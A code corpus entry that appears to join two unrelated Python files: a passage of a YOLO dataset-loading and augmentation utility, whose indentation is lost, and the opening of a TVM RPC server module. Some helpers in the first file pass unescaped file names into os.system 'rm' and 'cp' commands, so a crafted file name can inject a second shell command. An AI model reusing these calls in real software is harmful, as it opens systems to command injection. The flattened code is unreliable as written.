labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
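# Illustrative example (not part of the original file): letterboxing a 1280x720
# (w x h) frame to 640 with auto=True scales it by 0.5 to 640x360, then pads the
# height up to the next multiple of 64, giving a 640x384 image with 12 px of
# grey border on the top and bottom.
def _letterbox_example():
    img = np.zeros((720, 1280, 3), dtype=np.uint8)
    out, ratio, (dw, dh) = letterbox(img, 640)
    return out.shape, ratio, (dw, dh)  # ((384, 640, 3), (0.5, 0.5), (0.0, 12.0))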
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
server.py
|
"""RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
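# A minimal sketch (not part of the original module) of the client side of the
# handshake described in the module docstring: send RPC_MAGIC, then the key
# length as an int32, then the key bytes. Host, port and key are illustrative.
def _example_handshake(host="127.0.0.1", port=9091, key="client:cpu"):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.sendall(struct.pack("<i", base.RPC_MAGIC))  # RPC_MAGIC
    sock.sendall(struct.pack("<i", len(key)))        # keysize(int32)
    sock.sendall(key.encode("utf-8"))                # key-bytes
    # the server answers with an int32 status code followed by its own key
    return sock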
def _server_env(load_library, logger):
"""Server environment function return temp dir"""
temp = util.tempdir()
if logger is None:
logger = logging.getLogger()
# pylint: disable=unused-variable
@register_func("tvm.rpc.server.workpath")
def get_workpath(path):
return temp.relpath(path)
@register_func("tvm.rpc.server.load_module", override=True)
def load_module(file_name):
"""Load module from remote side."""
path = temp.relpath(file_name)
m = _load_module(path)
logger.info("load_module %s", path)
return m
libs = []
load_library = load_library.split(":") if load_library else []
for file_name in load_library:
file_name = find_lib_path(file_name)[0]
libs.append(ctypes.CDLL(file_name, ctypes.RTLD_GLOBAL))
logger.info("Load additional library %s", file_name)
temp.libs = libs
return temp
def _serve_loop(sock, addr, load_library, silent):
"""Server loop"""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
sockfd = sock.fileno()
temp = _server_env(load_library, logger)
base._ServerLoop(sockfd)
temp.remove()
logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr, silent):
"""Listening loop of the server master."""
logger = logging.getLogger("RPCServer")
if silent:
logger.disabled = True
def _accept_conn(listen_sock, tracker_conn, ping_period=2):
"""Accept connection from the other places.
Parameters
----------
listen_sock: Socket
The socket used by listening process.
        tracker_conn : connection to tracker
Tracker connection
ping_period : float, optional
            ping the tracker every `ping_period` seconds if no connection is accepted.
"""
old_keyset = set()
# Report resource to tracker
if tracker_conn:
matchkey = base.random_key(rpc_key + ":")
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey), custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
else:
matchkey = rpc_key
unmatch_period_count = 0
unmatch_timeout = 4
# Wait until we get a valid connection
while True:
if tracker_conn:
trigger = select.select([listen_sock], [], [], ping_period)
if not listen_sock in trigger[0]:
base.sendjson(tracker_conn, [TrackerCode.GET_PENDING_MATCHKEYS])
pending_keys = base.recvjson(tracker_conn)
old_keyset.add(matchkey)
# if match key not in pending key set
# it means the key is acquired by a client but not used.
if matchkey not in pending_keys:
unmatch_period_count += 1
else:
unmatch_period_count = 0
# regenerate match key if key is acquired but not used for a while
if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
logger.info("no incoming connections, regenerate key ...")
matchkey = base.random_key(rpc_key + ":", old_keyset)
base.sendjson(tracker_conn,
[TrackerCode.PUT, rpc_key, (port, matchkey),
custom_addr])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
unmatch_period_count = 0
continue
conn, addr = listen_sock.accept()
magic = struct.unpack("<i", base.recvall(conn, 4))[0]
if magic != base.RPC_MAGIC:
conn.close()
continue
keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
key = py_str(base.recvall(conn, keylen))
arr = key.split()
expect_header = "client:" + matchkey
server_key = "server:" + rpc_key
if arr[0] != expect_header:
conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
conn.close()
logger.info("mismatch key from %s", addr)
continue
else:
conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
conn.sendall(struct.pack("<i", len(server_key)))
conn.sendall(server_key.encode("utf-8"))
return conn, addr, _parse_server_opt(arr[1:])
# Server logic
tracker_conn = None
while True:
try:
# step 1: setup tracker and report to tracker
if tracker_addr and tracker_conn is None:
tracker_conn = base.connect_with_retry(tracker_addr, silent=silent)
tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
if magic != base.RPC_TRACKER_MAGIC:
raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
# report status of current queue
cinfo = {"key" : "server:" + rpc_key}
base.sendjson(tracker_conn,
[TrackerCode.UPDATE_INFO, cinfo])
assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
# step 2: wait for in-coming connections
conn, addr, opts = _accept_conn(sock, tracker_conn)
except (socket.error, IOError):
# retry when tracker is dropped
if tracker_conn:
tracker_conn.close()
tracker_conn = None
continue
except RuntimeError as exc:
if silent:
return
else:
raise exc
# step 3: serving
logger.info("connection from %s", addr)
server_proc = multiprocessing.Process(target=_serve_loop,
args=(conn, addr, load_library, silent))
        server_proc.daemon = True
server_proc.start()
# close from our side.
conn.close()
# wait until server process finish or timeout
server_proc.join(opts.get("timeout", None))
if server_proc.is_alive():
logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library, silent):
logger = logging.getLogger("RPCProxy")
if silent:
logger.disabled = True
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.info("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library, silent))
            process.daemon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.info("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
        msg += py_str(out)
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a seperate process.
This is a simple python implementation based on multi-processing.
    It is also possible to implement a similar C-based server with the
    TVM runtime which does not depend on Python.
Parameters
----------
host : str
The host url of the server.
port : int
        The port to bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
        Whether to use Popen to start a fresh process instead of fork.
        Switching this on is recommended for local RPC demonstrations
        on GPU devices, to avoid fork-safety issues.
silent: bool, optional
        Whether to run this server in silent mode.
key : str, optional
The key used to identify the server in Proxy connection.
load_library : str, optional
List of additional libraries to be loaded during execution.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
silent=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.logger = logging.getLogger("RPCServer")
if silent:
self.logger.disabled = True
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
self.proc = multiprocessing.Process(
target=subprocess.check_call, args=(cmd,))
            self.proc.daemon = True
self.proc.start()
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
